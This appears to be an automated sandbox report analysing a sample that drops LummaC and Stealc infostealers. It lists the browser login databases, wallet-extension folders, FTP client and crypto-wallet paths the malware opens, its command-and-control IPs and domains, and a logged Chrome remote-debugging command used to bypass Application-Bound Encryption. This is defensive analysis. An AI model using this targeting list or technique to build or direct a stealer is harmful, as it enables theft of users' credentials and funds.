Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000A.00000003.3166621569.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3093876019.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3231030291.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2978992587.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3007919799.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3135467108.0000000001011000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3220379720.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3233138119.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3261656724.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2972144892.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3071939046.0000000000FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3228403714.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3135695992.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3093554780.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3261656724.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3170698705.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3031373012.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3058481738.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3004575297.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.3071848615.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.3218476120.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 2576, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: ba17bbfb21.exe PID: 3380, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 5228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 79ddad050f.exe PID: 2576, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000009.00000002.3254990045.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3255076281.0000000000251000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2997152380.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3265209742.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3165593747.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 5312, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0021EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_0021EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0021DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_0021DF51
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E1307A sqlite3_transfer_bindings, 9_2_61E1307A
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D5E6 sqlite3_bind_int64, 9_2_61E2D5E6
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D595 sqlite3_bind_double, 9_2_61E2D595
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E0B431 sqlite3_clear_bindings, 9_2_61E0B431
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E037F3 sqlite3_value_frombind, 9_2_61E037F3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D781 sqlite3_bind_zeroblob64, 9_2_61E2D781
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D714 sqlite3_bind_zeroblob, 9_2_61E2D714
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D68C sqlite3_bind_pointer, 9_2_61E2D68C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D65B sqlite3_bind_null, 9_2_61E2D65B
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D635 sqlite3_bind_int, 9_2_61E2D635
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D9B0 sqlite3_bind_value, 9_2_61E2D9B0
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D981 sqlite3_bind_text16, 9_2_61E2D981
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D945 sqlite3_bind_text64, 9_2_61E2D945
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D916 sqlite3_bind_text, 9_2_61E2D916
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D8E7 sqlite3_bind_blob64, 9_2_61E2D8E7
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E038CA sqlite3_bind_parameter_count, 9_2_61E038CA
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E158CA sqlite3_bind_parameter_index, 9_2_61E158CA
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E038DC sqlite3_bind_parameter_name, 9_2_61E038DC
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E2D8B8 sqlite3_bind_blob, 9_2_61E2D8B8
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572092 Sample: file.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 81 youtube.com 2->81 83 www.google.com 2->83 85 16 other IPs or domains 2->85 109 Multi AV Scanner detection for domain / URL 2->109 111 Suricata IDS alerts for network traffic 2->111 113 Found malware configuration 2->113 115 18 other signatures 2->115 9 skotes.exe 4 29 2->9         started        14 file.exe 5 2->14         started        16 79ddad050f.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 103 185.215.113.43, 49821, 49828, 49849 WHOLESALECONNECTIONSNL Portugal 9->103 105 185.215.113.16, 49855, 49874, 49901 WHOLESALECONNECTIONSNL Portugal 9->105 107 31.41.244.11, 49833, 80 AEROEXPRESS-ASRU Russian Federation 9->107 69 C:\Users\user\AppData\...\734386a52c.exe, PE32 9->69 dropped 71 C:\Users\user\AppData\...\ba17bbfb21.exe, PE32 9->71 dropped 73 C:\Users\user\AppData\...\e051bdf457.exe, PE32 9->73 dropped 79 7 other malicious files 9->79 dropped 145 Creates multiple autostart registry keys 9->145 147 Hides threads from debuggers 9->147 149 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->149 20 79ddad050f.exe 9->20         started        24 e051bdf457.exe 15 9->24         started        26 734386a52c.exe 9->26         started        34 2 other processes 9->34 75 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->75 dropped 77 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->77 dropped 151 Detected unpacking (changes PE section rights) 14->151 153 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 14->153 155 Tries to evade debugger and weak emulator (self modifying code) 14->155 165 2 other signatures 14->165 28 skotes.exe 14->28         started        157 Found many strings related to Crypto-Wallets (likely being stolen) 16->157 159 Tries to harvest and steal browser information (history, passwords, etc) 16->159 161 Tries to steal Crypto Currency Wallets 16->161 163 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->163 30 firefox.exe 18->30         started        32 msedge.exe 18->32         started        file6 signatures7 process8 dnsIp9 87 atten-supporse.biz 104.21.64.1, 443, 49872, 49879 CLOUDFLARENETUS United States 20->87 119 Antivirus detection for dropped file 20->119 121 Multi AV Scanner detection for dropped file 20->121 123 Detected unpacking (changes PE section rights) 20->123 139 4 other signatures 20->139 89 185.215.113.206, 49895, 49971, 80 WHOLESALECONNECTIONSNL Portugal 24->89 125 Attempt to bypass Chrome Application-Bound Encryption 24->125 127 Machine Learning detection for dropped file 24->127 129 Tries to evade debugger and weak emulator (self modifying code) 24->129 36 msedge.exe 24->36         started        39 chrome.exe 24->39         started        131 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->131 141 3 other signatures 26->141 133 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 28->133 143 2 other signatures 28->143 91 youtube.com 142.250.181.142, 443, 49958, 49959 GOOGLEUS United States 30->91 93 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49960, 49978, 49985 GOOGLEUS United States 30->93 97 6 other IPs or domains 30->97 42 firefox.exe 30->42         started        44 firefox.exe 30->44         started        95 80.82.65.70, 49881, 80 INT-NETWORKSC Netherlands 34->95 135 Binary is likely a compiled AutoIt script file 34->135 137 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 34->137 46 taskkill.exe 34->46         started        48 taskkill.exe 34->48         started        50 taskkill.exe 34->50         started        52 3 other processes 34->52 signatures10 process11 dnsIp12 117 Monitors registry run keys for changes 36->117 54 msedge.exe 36->54         started        99 239.255.255.250 unknown Reserved 39->99 56 chrome.exe 39->56         started        59 conhost.exe 46->59         started        61 conhost.exe 48->61         started        63 conhost.exe 50->63         started        65 conhost.exe 52->65         started        67 conhost.exe 52->67         started        signatures13 process14 dnsIp15 101 www.google.com 142.250.181.100, 443, 49925, 49926 GOOGLEUS United States 56->101
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
80.82.65.70
 unknown Netherlands
202425 INT-NETWORKSC false
104.21.64.1
 atten-supporse.biz United States
13335 CLOUDFLARENETUS false
142.250.181.142
 youtube.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
